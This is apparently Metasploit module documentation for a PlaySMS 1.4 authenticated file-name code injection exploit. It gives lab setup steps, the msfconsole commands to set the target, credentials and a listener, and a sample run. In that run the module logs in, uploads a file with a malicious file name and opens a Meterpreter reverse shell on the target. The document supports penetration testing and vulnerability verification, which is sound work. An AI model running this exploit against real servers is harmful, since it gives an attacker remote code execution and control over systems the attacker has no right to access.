3.2 KiB
3.2 KiB
Description
This module exploits a code injection vulnerability within an authenticated file upload feature in PlaySMS v1.4. This issue is caused by improper file name handling in sendfromfile.php file. Authenticated Users can upload a file and rename the file with a malicious payload. Additional information and vulnerabilities can be viewed on Exploit-DB 42044.
Verification Steps
Available at Exploit-DB
Vulnerable Application Installation Setup.
- Download Application :
wget https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz - Extract :
tar -xvf 577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz - Move In WebDirectory :
mv playsms-1.4/web/* /var/www/html/ - make config file:
cp /var/www/html/config-dist.php /var/www/html/config.php - Change Owner :
chown -R www-data:www-data /var/www/html/ - Set DB creds in config.php File. And dump playsms-1.4/db/playsms.sql in your playsms database.
- Now Visit : http://localhost/
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploit/multi/http/playsms_filename_exec - Do:
set rport <port> - Do:
set rhost <ip> - Do:
set targeturi SecreTSMSgatwayLogin - Do:
set username touhid - Do:
set password diana - Do:
check
[*] 10.22.1.10:80 The target appears to be vulnerable.
- Do:
set lport <port> - Do:
set lhost <ip> - Do:
exploit - You should get a shell.
Scenarios
Playsms on Ubuntu Linux
msf exploit(multi/http/playsms_filename_exec) > run
[*] Started reverse TCP handler on 10.22.1.3:4444
[+] X-CSRF-Token for login : 13bce9776cfc270a3779e8b557330cc2
[*] Trying to Login ......
[+] Authentication successful : [ touhid:diana ]
[+] X-CSRF-Token for upload : 2780d48dc11a482a58d8a95ad873c6cc
[*] Trying to upload file with malicious Filename Field....
[*] Sending stage (37775 bytes) to 10.22.1.15
[*] Sleeping before handling stage...
[*] Meterpreter session 1 opened (10.22.1.3:4444 -> 10.22.1.15:38814) at 2018-04-08 13:45:34 +0530
meterpreter >